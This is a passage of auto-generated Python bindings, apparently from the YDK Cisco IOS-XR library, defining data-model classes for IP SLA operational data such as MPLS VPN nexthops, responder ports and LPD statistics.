self.refresh_remaining = None
self._segment_path = lambda: "state"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/discovery/vpn/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.Discovery.Vpn.State, ['refresh_remaining'], name, value)
class Nexthops(Entity):
"""
List of nexthop addresses for remote PE
routers
.. attribute:: nexthop
Nexthop address for remote PE router
**type**\: list of :py:class:`Nexthop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.Discovery.Vpn.Nexthops, self).__init__()
self.yang_name = "nexthops"
self.yang_parent_name = "vpn"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("nexthop", ("nexthop", Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop))])
self._leafs = OrderedDict()
self.nexthop = YList(self)
self._segment_path = lambda: "nexthops"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/discovery/vpn/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.Discovery.Vpn.Nexthops, [], name, value)
class Nexthop(Entity):
"""
Nexthop address for remote PE router
.. attribute:: address (key)
Nexthop Address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: vrfs
List of VRFs for the nexthop address
**type**\: :py:class:`Vrfs <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs>`
.. attribute:: prefix
Prefix of the nexthop address
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Prefix>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop, self).__init__()
self.yang_name = "nexthop"
self.yang_parent_name = "nexthops"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['address']
self._child_container_classes = OrderedDict([("vrfs", ("vrfs", Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs)), ("prefix", ("prefix", Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Prefix))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('address', YLeaf(YType.str, 'address')),
])
self.address = None
self.vrfs = Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs()
self.vrfs.parent = self
self._children_name_map["vrfs"] = "vrfs"
self._children_yang_names.add("vrfs")
self.prefix = Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._children_yang_names.add("prefix")
self._segment_path = lambda: "nexthop" + "[address='" + str(self.address) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/mpls-data/discovery/vpn/nexthops/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop, ['address'], name, value)
class Vrfs(Entity):
"""
List of VRFs for the nexthop address
.. attribute:: vrf
VRF information of the nexthop address
**type**\: list of :py:class:`Vrf <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs.Vrf>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs, self).__init__()
self.yang_name = "vrfs"
self.yang_parent_name = "nexthop"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("vrf", ("vrf", Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs.Vrf))])
self._leafs = OrderedDict()
self.vrf = YList(self)
self._segment_path = lambda: "vrfs"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs, [], name, value)
class Vrf(Entity):
"""
VRF information of the nexthop address
.. attribute:: vrf_name (key)
VRF Name
**type**\: str
**length:** 1..32
.. attribute:: prefix_count
Number of prefixes in VRF
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs.Vrf, self).__init__()
self.yang_name = "vrf"
self.yang_parent_name = "vrfs"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = ['vrf_name']
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('vrf_name', YLeaf(YType.str, 'vrf-name')),
('prefix_count', YLeaf(YType.uint32, 'prefix-count')),
])
self.vrf_name = None
self.prefix_count = None
self._segment_path = lambda: "vrf" + "[vrf-name='" + str(self.vrf_name) + "']"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Vrfs.Vrf, ['vrf_name', 'prefix_count'], name, value)
class Prefix(Entity):
"""
Prefix of the nexthop address
.. attribute:: target_address
PE target address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: target_mask
PE target mask length
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "nexthop"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('target_address', YLeaf(YType.str, 'target-address')),
('target_mask', YLeaf(YType.uint32, 'target-mask')),
])
self.target_address = None
self.target_mask = None
self._segment_path = lambda: "prefix"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.MplsData.Discovery.Vpn.Nexthops.Nexthop.Prefix, ['target_address', 'target_mask'], name, value)
class Responder(Entity):
"""
Data from responder probe handling
.. attribute:: ports
Statistics maintained by responder
**type**\: :py:class:`Ports <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.Responder.Ports>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.Responder, self).__init__()
self.yang_name = "responder"
self.yang_parent_name = "ipsla"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("ports", ("ports", Ipsla.Responder.Ports))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.ports = Ipsla.Responder.Ports()
self.ports.parent = self
self._children_name_map["ports"] = "ports"
self._children_yang_names.add("ports")
self._segment_path = lambda: "responder"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/%s" % self._segment_path()
class Ports(Entity):
"""
Statistics maintained by responder
.. attribute:: port
Port data
**type**\: list of :py:class:`Port <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.Responder.Ports.Port>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.Responder.Ports, self).__init__()
self.yang_name = "ports"
self.yang_parent_name = "responder"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("port", ("port", Ipsla.Responder.Ports.Port))])
self._leafs = OrderedDict()
self.port = YList(self)
self._segment_path = lambda: "ports"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/responder/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.Responder.Ports, [], name, value)
class Port(Entity):
"""
Port data
.. attribute:: port (key)
Port
**type**\: int
**range:** 0..65535
.. attribute:: port_xr
Port on which Responder is listening
**type**\: int
**range:** 0..65535
.. attribute:: local_address
IP address of Responder
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
.. attribute:: num_probes
Number of probes received from remote end
**type**\: int
**range:** 0..4294967295
.. attribute:: ctrl_probes
Number of control probes received from remote end
**type**\: int
**range:** 0..4294967295
.. attribute:: permanent
Port type if this is permanent or dynamic port
**type**\: bool
.. attribute:: discard_on
Current discard socket option flag for the port
**type**\: bool
.. attribute:: pd_time_stamp_failed
PD Timestamp failure
**type**\: bool
.. attribute:: is_ipsla
IPSLA or TWAMP protocol
**type**\: bool
.. attribute:: drop_counter
Drop counter for the Responder port
**type**\: int
**range:** 0..4294967295
.. attribute:: socket
Socket
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: sender
List of senders
**type**\: list of :py:class:`Sender <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.Responder.Ports.Port.Sender>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.Responder.Ports.Port, self).__init__()
self.yang_name = "port"
self.yang_parent_name = "ports"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['port']
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("sender", ("sender", Ipsla.Responder.Ports.Port.Sender))])
self._leafs = OrderedDict([
('port', YLeaf(YType.uint16, 'port')),
('port_xr', YLeaf(YType.uint16, 'port-xr')),
('local_address', YLeaf(YType.str, 'local-address')),
('num_probes', YLeaf(YType.uint32, 'num-probes')),
('ctrl_probes', YLeaf(YType.uint32, 'ctrl-probes')),
('permanent', YLeaf(YType.boolean, 'permanent')),
('discard_on', YLeaf(YType.boolean, 'discard-on')),
('pd_time_stamp_failed', YLeaf(YType.boolean, 'pd-time-stamp-failed')),
('is_ipsla', YLeaf(YType.boolean, 'is-ipsla')),
('drop_counter', YLeaf(YType.uint32, 'drop-counter')),
('socket', YLeaf(YType.int32, 'socket')),
])
self.port = None
self.port_xr = None
self.local_address = None
self.num_probes = None
self.ctrl_probes = None
self.permanent = None
self.discard_on = None
self.pd_time_stamp_failed = None
self.is_ipsla = None
self.drop_counter = None
self.socket = None
self.sender = YList(self)
self._segment_path = lambda: "port" + "[port='" + str(self.port) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/responder/ports/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.Responder.Ports.Port, ['port', 'port_xr', 'local_address', 'num_probes', 'ctrl_probes', 'permanent', 'discard_on', 'pd_time_stamp_failed', 'is_ipsla', 'drop_counter', 'socket'], name, value)
class Sender(Entity):
"""
List of senders
.. attribute:: ip_address
IP address of Sender
**type**\: int
**range:** 0..4294967295
.. attribute:: port
Port on which Sender is sending
**type**\: int
**range:** 0..65535
.. attribute:: last_recv_time
Last received time
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.Responder.Ports.Port.Sender, self).__init__()
self.yang_name = "sender"
self.yang_parent_name = "port"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('ip_address', YLeaf(YType.uint32, 'ip-address')),
('port', YLeaf(YType.uint16, 'port')),
('last_recv_time', YLeaf(YType.uint64, 'last-recv-time')),
])
self.ip_address = None
self.port = None
self.last_recv_time = None
self._segment_path = lambda: "sender"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.Responder.Ports.Port.Sender, ['ip_address', 'port', 'last_recv_time'], name, value)
class OperationData(Entity):
"""
Operations data
.. attribute:: operations
Configured operations
**type**\: :py:class:`Operations <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData, self).__init__()
self.yang_name = "operation-data"
self.yang_parent_name = "ipsla"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("operations", ("operations", Ipsla.OperationData.Operations))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.operations = Ipsla.OperationData.Operations()
self.operations.parent = self
self._children_name_map["operations"] = "operations"
self._children_yang_names.add("operations")
self._segment_path = lambda: "operation-data"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/%s" % self._segment_path()
class Operations(Entity):
"""
Configured operations
.. attribute:: operation_
Operational data for an operation
**type**\: list of :py:class:`Operation <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations, self).__init__()
self.yang_name = "operations"
self.yang_parent_name = "operation-data"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([("operation", ("operation_", Ipsla.OperationData.Operations.Operation))])
self._leafs = OrderedDict()
self.operation_ = YList(self)
self._segment_path = lambda: "operations"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/operation-data/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations, [], name, value)
class Operation(Entity):
"""
Operational data for an operation
.. attribute:: operation_id (key)
Operation ID
**type**\: int
**range:** \-2147483648..2147483647
.. attribute:: common
Common data for all operation types
**type**\: :py:class:`Common <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Common>`
.. attribute:: lpd
LPD operational data of MPLS LSP group operation
**type**\: :py:class:`Lpd <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd>`
.. attribute:: history
Historical data for an operation
**type**\: :py:class:`History <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.History>`
.. attribute:: statistics
Statistics collected for an operation
**type**\: :py:class:`Statistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Statistics>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation, self).__init__()
self.yang_name = "operation"
self.yang_parent_name = "operations"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = ['operation_id']
self._child_container_classes = OrderedDict([("common", ("common", Ipsla.OperationData.Operations.Operation.Common)), ("lpd", ("lpd", Ipsla.OperationData.Operations.Operation.Lpd)), ("history", ("history", Ipsla.OperationData.Operations.Operation.History)), ("statistics", ("statistics", Ipsla.OperationData.Operations.Operation.Statistics))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('operation_id', YLeaf(YType.int32, 'operation-id')),
])
self.operation_id = None
self.common = Ipsla.OperationData.Operations.Operation.Common()
self.common.parent = self
self._children_name_map["common"] = "common"
self._children_yang_names.add("common")
self.lpd = Ipsla.OperationData.Operations.Operation.Lpd()
self.lpd.parent = self
self._children_name_map["lpd"] = "lpd"
self._children_yang_names.add("lpd")
self.history = Ipsla.OperationData.Operations.Operation.History()
self.history.parent = self
self._children_name_map["history"] = "history"
self._children_yang_names.add("history")
self.statistics = Ipsla.OperationData.Operations.Operation.Statistics()
self.statistics.parent = self
self._children_name_map["statistics"] = "statistics"
self._children_yang_names.add("statistics")
self._segment_path = lambda: "operation" + "[operation-id='" + str(self.operation_id) + "']"
self._absolute_path = lambda: "Cisco-IOS-XR-man-ipsla-oper:ipsla/operation-data/operations/%s" % self._segment_path()
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation, ['operation_id'], name, value)
class Common(Entity):
"""
Common data for all operation types
.. attribute:: operational_state
Operational state for an operation
**type**\: :py:class:`OperationalState <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Common.OperationalState>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Common, self).__init__()
self.yang_name = "common"
self.yang_parent_name = "operation"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("operational-state", ("operational_state", Ipsla.OperationData.Operations.Operation.Common.OperationalState))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.operational_state = Ipsla.OperationData.Operations.Operation.Common.OperationalState()
self.operational_state.parent = self
self._children_name_map["operational_state"] = "operational-state"
self._children_yang_names.add("operational-state")
self._segment_path = lambda: "common"
class OperationalState(Entity):
"""
Operational state for an operation
.. attribute:: modification_time
Last modification time of the operation expressed in msec since 00\:00\:00 UTC, January 1, 1970
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: start_time
Last start time of the operation expressedin msec since 00\:00\:00 UTC, January 1, 1970
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: attempt_count
Number of data collection attempts
**type**\: int
**range:** 0..4294967295
.. attribute:: skipped_count
Number of data collection cycles skipped
**type**\: int
**range:** 0..4294967295
.. attribute:: life_remaining
Number of seconds left in current life
**type**\: int
**range:** 0..4294967295
**units**\: second
.. attribute:: frequency
Number of configured frequency Default 60
**type**\: int
**range:** 0..4294967295
.. attribute:: recurring
For recurring operation configured
**type**\: bool
.. attribute:: operational_state
Operational state
**type**\: :py:class:`IpslaOperStateEnum <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaOperStateEnum>`
.. attribute:: flags
Internal flags
**type**\: int
**range:** 0..4294967295
.. attribute:: local_port
Cached local port
**type**\: int
**range:** 0..65535
.. attribute:: unexpected_packets
Unexpected probe pkts punted from LPTS
**type**\: int
**range:** 0..4294967295
.. attribute:: unexpected_control_packets
Unexpected control pkts puntedfrom LPTS
**type**\: int
**range:** 0..4294967295
.. attribute:: operation_time
Start time of current instance of the operation
**type**\: int
**range:** 0..18446744073709551615
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Common.OperationalState, self).__init__()
self.yang_name = "operational-state"
self.yang_parent_name = "common"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('modification_time', YLeaf(YType.uint64, 'modification-time')),
('start_time', YLeaf(YType.uint64, 'start-time')),
('attempt_count', YLeaf(YType.uint32, 'attempt-count')),
('skipped_count', YLeaf(YType.uint32, 'skipped-count')),
('life_remaining', YLeaf(YType.uint32, 'life-remaining')),
('frequency', YLeaf(YType.uint32, 'frequency')),
('recurring', YLeaf(YType.boolean, 'recurring')),
('operational_state', YLeaf(YType.enumeration, 'operational-state')),
('flags', YLeaf(YType.uint32, 'flags')),
('local_port', YLeaf(YType.uint16, 'local-port')),
('unexpected_packets', YLeaf(YType.uint32, 'unexpected-packets')),
('unexpected_control_packets', YLeaf(YType.uint32, 'unexpected-control-packets')),
('operation_time', YLeaf(YType.uint64, 'operation-time')),
])
self.modification_time = None
self.start_time = None
self.attempt_count = None
self.skipped_count = None
self.life_remaining = None
self.frequency = None
self.recurring = None
self.operational_state = None
self.flags = None
self.local_port = None
self.unexpected_packets = None
self.unexpected_control_packets = None
self.operation_time = None
self._segment_path = lambda: "operational-state"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Common.OperationalState, ['modification_time', 'start_time', 'attempt_count', 'skipped_count', 'life_remaining', 'frequency', 'recurring', 'operational_state', 'flags', 'local_port', 'unexpected_packets', 'unexpected_control_packets', 'operation_time'], name, value)
class Lpd(Entity):
"""
LPD operational data of MPLS LSP group
operation
.. attribute:: statistics
Statistics collected for LPD group
**type**\: :py:class:`Statistics <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics>`
.. attribute:: status
Operational status of LPD group
**type**\: :py:class:`Status <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Status>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd, self).__init__()
self.yang_name = "lpd"
self.yang_parent_name = "operation"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("statistics", ("statistics", Ipsla.OperationData.Operations.Operation.Lpd.Statistics)), ("status", ("status", Ipsla.OperationData.Operations.Operation.Lpd.Status))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.statistics = Ipsla.OperationData.Operations.Operation.Lpd.Statistics()
self.statistics.parent = self
self._children_name_map["statistics"] = "statistics"
self._children_yang_names.add("statistics")
self.status = Ipsla.OperationData.Operations.Operation.Lpd.Status()
self.status.parent = self
self._children_name_map["status"] = "status"
self._children_yang_names.add("status")
self._segment_path = lambda: "lpd"
class Statistics(Entity):
"""
Statistics collected for LPD group
.. attribute:: latest
LPD statistics collected during the last sampling cycle
**type**\: :py:class:`Latest <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest>`
.. attribute:: aggregated
Statistics aggregated for LPD group collected over time intervals
**type**\: :py:class:`Aggregated <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics, self).__init__()
self.yang_name = "statistics"
self.yang_parent_name = "lpd"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("latest", ("latest", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest)), ("aggregated", ("aggregated", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.latest = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest()
self.latest.parent = self
self._children_name_map["latest"] = "latest"
self._children_yang_names.add("latest")
self.aggregated = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Aggregated()
self.aggregated.parent = self
self._children_name_map["aggregated"] = "aggregated"
self._children_yang_names.add("aggregated")
self._segment_path = lambda: "statistics"
class Latest(Entity):
"""
LPD statistics collected during the last
sampling cycle
.. attribute:: target
Latest statistics of LPD group
**type**\: :py:class:`Target <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target>`
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest, self).__init__()
self.yang_name = "latest"
self.yang_parent_name = "statistics"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("target", ("target", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict()
self.target = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target()
self.target.parent = self
self._children_name_map["target"] = "target"
self._children_yang_names.add("target")
self._segment_path = lambda: "latest"
class Target(Entity):
"""
Latest statistics of LPD group
.. attribute:: target_address
LPD target
**type**\: :py:class:`TargetAddress <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress>`
.. attribute:: start_time
LPD start time
**type**\: int
**range:** 0..18446744073709551615
.. attribute:: return_code
LPD return code
**type**\: :py:class:`IpslaMplsLpdRetCode <ydk.models.cisco_ios_xr.Cisco_IOS_XR_man_ipsla_oper.IpslaMplsLpdRetCode>`
.. attribute:: completion_time_count
Number of CompT samples
**type**\: int
**range:** 0..4294967295
.. attribute:: completion_time
LPD Completion time
**type**\: int
**range:** 0..4294967295
.. attribute:: min_completion_time
Minimum CompT
**type**\: int
**range:** 0..4294967295
.. attribute:: max_completion_time
Maximum CompT
**type**\: int
**range:** 0..4294967295
.. attribute:: sum_completion_time
Sum of CompT
**type**\: int
**range:** 0..4294967295
.. attribute:: path_count
Number of paths
**type**\: int
**range:** 0..4294967295
.. attribute:: min_path_count
Minimum number of paths
**type**\: int
**range:** 0..4294967295
.. attribute:: max_path_count
Maximum number of paths
**type**\: int
**range:** 0..4294967295
.. attribute:: ok_count
Number of successes
**type**\: int
**range:** 0..4294967295
.. attribute:: no_path_count
Number of failures due to no path
**type**\: int
**range:** 0..4294967295
.. attribute:: all_paths_broken_count
Number of failures due to all paths broken
**type**\: int
**range:** 0..4294967295
.. attribute:: all_paths_unexplorable_count
Number of failures due to all paths unexplorable
**type**\: int
**range:** 0..4294967295
.. attribute:: all_paths_broken_or_unexplorable_count
Number of failures due to all paths broken or unexplorable
**type**\: int
**range:** 0..4294967295
.. attribute:: timeout_count
Number of failures due to timeout
**type**\: int
**range:** 0..4294967295
.. attribute:: internal_error_count
Number of failures due to internal error
**type**\: int
**range:** 0..4294967295
.. attribute:: unknown_count
Number of failures due to unknown cause
**type**\: int
**range:** 0..4294967295
"""
_prefix = 'man-ipsla-oper'
_revision = '2015-11-09'
def __init__(self):
super(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target, self).__init__()
self.yang_name = "target"
self.yang_parent_name = "latest"
self.is_top_level_class = False
self.has_list_ancestor = True
self.ylist_key_names = []
self._child_container_classes = OrderedDict([("target-address", ("target_address", Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress))])
self._child_list_classes = OrderedDict([])
self._leafs = OrderedDict([
('start_time', YLeaf(YType.uint64, 'start-time')),
('return_code', YLeaf(YType.enumeration, 'return-code')),
('completion_time_count', YLeaf(YType.uint32, 'completion-time-count')),
('completion_time', YLeaf(YType.uint32, 'completion-time')),
('min_completion_time', YLeaf(YType.uint32, 'min-completion-time')),
('max_completion_time', YLeaf(YType.uint32, 'max-completion-time')),
('sum_completion_time', YLeaf(YType.uint32, 'sum-completion-time')),
('path_count', YLeaf(YType.uint32, 'path-count')),
('min_path_count', YLeaf(YType.uint32, 'min-path-count')),
('max_path_count', YLeaf(YType.uint32, 'max-path-count')),
('ok_count', YLeaf(YType.uint32, 'ok-count')),
('no_path_count', YLeaf(YType.uint32, 'no-path-count')),
('all_paths_broken_count', YLeaf(YType.uint32, 'all-paths-broken-count')),
('all_paths_unexplorable_count', YLeaf(YType.uint32, 'all-paths-unexplorable-count')),
('all_paths_broken_or_unexplorable_count', YLeaf(YType.uint32, 'all-paths-broken-or-unexplorable-count')),
('timeout_count', YLeaf(YType.uint32, 'timeout-count')),
('internal_error_count', YLeaf(YType.uint32, 'internal-error-count')),
('unknown_count', YLeaf(YType.uint32, 'unknown-count')),
])
self.start_time = None
self.return_code = None
self.completion_time_count = None
self.completion_time = None
self.min_completion_time = None
self.max_completion_time = None
self.sum_completion_time = None
self.path_count = None
self.min_path_count = None
self.max_path_count = None
self.ok_count = None
self.no_path_count = None
self.all_paths_broken_count = None
self.all_paths_unexplorable_count = None
self.all_paths_broken_or_unexplorable_count = None
self.timeout_count = None
self.internal_error_count = None
self.unknown_count = None
self.target_address = Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target.TargetAddress()
self.target_address.parent = self
self._children_name_map["target_address"] = "target-address"
self._children_yang_names.add("target-address")
self._segment_path = lambda: "target"
def __setattr__(self, name, value):
self._perform_setattr(Ipsla.OperationData.Operations.Operation.Lpd.Statistics.Latest.Target, ['start_time', 'return_code', 'completion_time_count', 'completion_time', 'min_completion_time', 'max_completion_time', 'sum_completion_time', 'path_count', 'min_path_count', 'max_path_count', 'ok_count', 'no_path_count', 'all_paths_broken_count', 'all_paths_unexplorable_count', 'all_paths_broken_or_unexplorable_count', 'timeout_count', 'internal_error_count', 'unknown_count'], name, value)
class TargetAddress(Entity):
"""
LPD target
.. attribute:: ipv4_prefix_target
IPv4 prefix target
